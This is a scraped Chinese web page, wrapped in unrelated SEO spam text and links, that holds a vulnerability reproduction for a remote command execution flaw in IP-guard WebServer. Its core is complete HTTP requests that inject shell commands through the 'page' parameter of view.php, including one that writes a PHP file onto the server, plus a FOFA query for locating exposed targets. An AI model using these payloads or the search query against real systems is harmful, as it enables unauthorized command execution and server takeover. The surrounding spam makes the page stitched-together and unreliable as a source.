当前位置: 首页 > news >正文

宁波网站建设制作网络公司手机关键词seo排名优化

宁波网站建设制作网络公司,手机关键词seo排名优化,web 网站做横道图,科研院所网站建设IP-guard WebServer 远程命令执行漏洞 免责声明漏洞描述漏洞影响漏洞危害网络测绘Fofa: app"ip-guard" 漏洞复现1. 构造poc2. 访问文件3. 执行命令 免责声明 仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。 任何人不…

IP-guard WebServer 远程命令执行漏洞

  • 免责声明
  • 漏洞描述
  • 漏洞影响
  • 漏洞危害
  • 网络测绘
    • Fofa: app="ip-guard"
  • 漏洞复现
    • 1. 构造poc
    • 2. 访问文件
    • 3. 执行命令

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。

漏洞影响

IP-guard < 4.81.0307.0

漏洞危害

未经允许的攻击者可通过该漏洞执行操作系统命令,接管服务器。

网络测绘

Fofa: app=“ip-guard”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+123+>+test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240xxxxxxxxn0ug6; PHPSESSID=dqmb1suxxxxxxxxxxa9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

2. 访问文件

GET /ipg/static/appr/lib/flexpaper/php/test.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkri5qp27v40f6bj4getn0ug6; PHPSESSID=dqmb1suk7ci3te6rga9fmk7tii
Upgrade-Insecure-Requests: 1

在这里插入图片描述

3. 执行命令

GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Etest.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ipg_session=0vj0240nkrxxxxxxxetn0ug6; PHPSESSID=dqmb1suk7xxxxxxxxxxxxtii
Upgrade-Insecure-Requests: 1

在这里插入图片描述
在这里插入图片描述

http://www.mmbaike.com/news/102820.html

相关文章:

  • 观澜网站建设公司seo是指什么职位
  • 净空老法师弟子做的免费祭祖网站我想做app推广怎么做
  • 大连永锐网站哪家做的无代码网站开发平台
  • 品牌型网站建设方案企业培训的目的和意义
  • 深圳工业设计培训班成都seo网络优化公司
  • wordpress首页置顶文章排序什么是seo
  • 佘山做网站公司网站优化方式有哪些
  • 珠海做网站优化的公司什么是seo优化?
  • 上海网站建设建站seo关键词排名优化费用
  • 外贸网站 备案百度做广告推广怎么样
  • 专门做手工的网站seo文章生成器
  • 莱芜营销型网站制作万网域名注册官网查询
  • 小程序网站开发怎么样贵州百度seo整站优化
  • 太原阳性确诊seo顾问是什么职业
  • 杭州高端响应式网站seo技术306
  • 深圳网站做的好的公司珠海百度seo
  • 个人网站域名备案今日热点头条新闻
  • 聊城做网站推广公司电商营销推广方法
  • 500强网站设计网络推广费用高吗
  • 那个软件可以做网站南宁做网站公司
  • 大岭山仿做网站网站发帖推广平台
  • 做类似360手赚那样的网站今天nba新闻最新消息
  • 英文网站制作自己做一个网站需要什么
  • 温州seo霸屏seo高手培训
  • 柏枫谈做网站都需要学什么在线推广企业网站的方法有
  • 深圳做针织衫服装的网站公司网络搭建
  • app开发注意事项枣庄网络推广seo
  • 为企业交流合作搭建平台seo关键词使用
  • 维护网站要做哪些工作googleplay
  • 做黑枸杞的公司网站资源平台